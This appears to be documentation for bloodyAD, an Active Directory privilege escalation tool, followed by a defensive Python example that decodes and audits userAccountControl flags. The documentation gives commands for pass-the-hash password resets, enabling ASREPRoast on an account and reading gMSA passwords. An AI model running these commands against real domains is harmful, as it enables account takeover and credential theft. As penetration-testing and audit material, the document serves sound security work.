bloodyAD : Active Directory Privilege Escalation Framework

bloodyAD.py is an Active Directory privilege escalation swiss army knife

Description

This tool can perform specific LDAP/SAMR calls to a domain controller in order to perform AD privesc.

bloodyAD supports authentication using cleartext passwords, pass-the-hash, pass-the-ticket or certificates and binds to LDAP services of a domain controller to perform AD privesc.

It is designed to be used transparently with a SOCKS proxy.

Installation

First, if you run it on Linux, you must have libkrb5-dev (or your distribution's equivalent) installed on your OS in order for Kerberos to work:

Debian/Ubuntu/Kali
apt-get install libkrb5-dev
Centos/RHEL
yum install krb5-devel
Fedora
dnf install krb5-devel
Arch Linux
pacman -S krb5

A python package is available:

pip install bloodyAD
bloodyAD --host 172.16.1.15 -d bloody.local -k changePassword john.doe 'Password123!'

Or you can clone the repo:

git clone --depth 1 https://github.com/CravateRouge/bloodyAD
pip install .
bloodyAD --host 172.16.1.15 -d bloody.local -k changePassword john.doe 'Password123!'

Dependencies

  • Python 3
  • DSinternals
  • Impacket
  • Ldap3
  • Gssapi (Linux) or Winkerberos (Windows)

Usage

Simple usage:

bloodyAD --host 172.16.1.15 -d bloody.local -u jane.doe -p :70016778cb0524c799ac25b439bd6a31 changePassword john.doe 'Password123!'

Note: You can find more examples on https://cravaterouge.github.io/

List of all available functions:

[bloodyAD]$ bloodyAD -h
usage: bloodyAD [-h] [-d DOMAIN] [-u USERNAME] [-p PASSWORD] [-k] [-c CERTIFICATE] [-s] [--host HOST]
{getObjectAttributes,setAttribute,addUser,addComputer,delObject,changePassword,addObjectToGroup,addForeignObjectToGroup,delObjectFromGroup,getChildObjects,setShadowCredentials,setGenericAll,setOwner,setRbcd,setDCSync,setUserAccountControl}

AD Privesc Swiss Army Knife
Main options:
-h, --help            show this help message and exit
-d DOMAIN, --domain DOMAIN
                      Domain used for NTLM authentication
-u USERNAME, --username USERNAME
                      Username used for NTLM authentication
-p PASSWORD, --password PASSWORD
                      Cleartext password or LMHASH:NTHASH for NTLM authentication
-k, --kerberos
-c CERTIFICATE, --certificate CERTIFICATE
                      Certificate authentication, e.g: "path/to/key:path/to/cert"
-s, --secure          Try to use LDAP over TLS aka LDAPS (default is LDAP)
--host HOST           Hostname or IP of the DC (ex: my.dc.local or 172.16.1.3)
Commands:
{getObjectAttributes,setAttribute,addUser,addComputer,delObject,changePassword,addObjectToGroup,addForeignObjectToGroup,delObjectFromGroup,getChildObjects,setShadowCredentials,setGenericAll,setOwner,setRbcd,setDCSync,setUserAccountControl}
                      Function to call

Useful commands

Get group members
bloodyAD -u john.doe -d bloody -p Password512! --host 192.168.10.2 getObjectAttributes Users member
Get minimum password length policy
bloodyAD -u john.doe -d bloody -p Password512! --host 192.168.10.2 getObjectAttributes 'DC=bloody,DC=local' minPwdLength
Get AD functional level
bloodyAD -u Administrator -d bloody -p Password512! --host 192.168.10.2 getObjectAttributes 'DC=bloody,DC=local' msDS-Behavior-Version
Get all users of the domain
bloodyAD -u john.doe -d bloody -p Password512! --host 192.168.10.2 getChildObjects 'DC=bloody,DC=local' user
Get all computers of the domain
bloodyAD -u john.doe -d bloody -p Password512! --host 192.168.10.2 getChildObjects 'DC=bloody,DC=local' computer
Get all containers of the domain
bloodyAD -u john.doe -d bloody -p Password512! --host 192.168.10.2 getChildObjects 'DC=bloody,DC=local' container
Enable DONT_REQ_PREAUTH for ASREPRoast
bloodyAD -u Administrator -d bloody -p Password512! --host 192.168.10.2 setUserAccountControl john.doe 0x400000
Disable ACCOUNTDISABLE
bloodyAD -u Administrator -d bloody -p Password512! --host 192.168.10.2 setUserAccountControl john.doe 0x0002 False
Get UserAccountControl flags
bloodyAD -u Administrator -d bloody -p Password512! --host 192.168.10.2 getObjectAttributes john.doe userAccountControl
Read GMSA account password
bloodyAD -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes gmsaAccount$ msDS-ManagedPassword
Read quota for adding computer objects to domain
bloodyAD -u john.doe -d bloody -p Password512! --host 192.168.10.2 getObjectAttributes 'DC=bloody,DC=local' ms-DS-MachineAccountQuota
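The setUserAccountControl and getObjectAttributes commands above work on the raw userAccountControl bitmask. The following added example (not bloodyAD's own code) shows what those hex arguments mean: it decodes a value into flag names, applies the same set/clear semantics as the two setUserAccountControl calls, builds the LDAP bitwise-AND filter a defender can use to find every account with a given flag, and audits a constructed list of accounts for flags worth reviewing. The flag values are Microsoft's documented userAccountControl bits; the RISKY set and the sample accounts are assumptions for the example.

```python
"""Decode and audit userAccountControl values (added example, not bloodyAD code)."""
from __future__ import annotations

# Subset of the userAccountControl bits documented by Microsoft.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
# Flags whose presence an auditor should question (hypothetical policy choice).
RISKY = {0x0020, 0x80000, 0x400000, 0x1000000}

def parse_flag(arg: str) -> int:
    """Accept the hex (0x400000) or decimal (4194304) form used on the command line."""
    return int(arg, 0)

def decode_uac(value: int) -> list[str]:
    """Return the names of the known bits set in value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

def apply_uac(value: int, flag: int, enable: bool = True) -> int:
    """Set or clear one flag, as setUserAccountControl <flag> [True|False] does."""
    return value | flag if enable else value & ~flag

def uac_filter(flag: int) -> str:
    """LDAP filter selecting users with the flag set (bitwise-AND matching rule)."""
    return f"(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:={flag}))"

def audit(entries: list[tuple[str, int]]) -> dict[str, list[str]]:
    """Map each account to its risky flags; accounts with none are omitted."""
    out: dict[str, list[str]] = {}
    for sam, uac in entries:
        hits = [UAC_FLAGS[b] for b in sorted(RISKY) if uac & b]
        if hits:
            out[sam] = hits
    return out

# Constructed sample data: (sAMAccountName, userAccountControl).
SAMPLE = [("john.doe", 0x0200 | 0x0002), ("svc.backup", 0x0200 | 0x400000 | 0x10000)]

if __name__ == "__main__":
    uac = SAMPLE[0][1]
    uac = apply_uac(uac, parse_flag("0x0002"), False)  # Disable ACCOUNTDISABLE
    uac = apply_uac(uac, parse_flag("0x400000"))       # Enable DONT_REQ_PREAUTH
    print(hex(uac), decode_uac(uac))
    print(uac_filter(0x400000))
    print(audit(SAMPLE))
```

Running the filter from uac_filter against the domain with any LDAP client lists the accounts that bloodyAD's setUserAccountControl would have changed, which is the quickest way to spot a stray DONT_REQ_PREAUTH bit.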

R K
